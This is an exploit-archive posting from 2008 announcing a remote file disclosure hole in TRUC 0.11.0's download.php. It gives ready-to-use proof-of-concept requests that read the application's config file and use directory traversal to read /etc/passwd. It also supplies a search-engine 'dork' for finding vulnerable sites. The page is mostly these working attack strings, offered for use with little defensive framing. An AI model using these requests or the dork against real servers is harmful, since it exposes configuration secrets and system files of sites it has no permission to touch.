TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
# Published : 2008-02-16
# Author : GoLd_M
# Previous Title : XPWeb 3.3.2 (Download.php url) Remote File Disclosure Vulnerability
# Next Title : AuraCMS 1.62 Multiple Remote SQL Injection Exploit

### TRUC 0.11.0 (download.php) Remote File Disclosure Vulnerability
### http://switch.dl.sourceforge.net/sourceforge/truc/truc_0.11.0.tar.gz
### POC :
### /download.php?upload_filename=config_inc.php
### /download.php?upload_filename=../../../../../../../../etc/passwd
### Dork : TRUC 0.11.0 :: ?? 2006 by ASDIS :
### I'm TRYAGI  ;)  -- Tryag.cc/cc

# www.Syue.com [2008-02-16]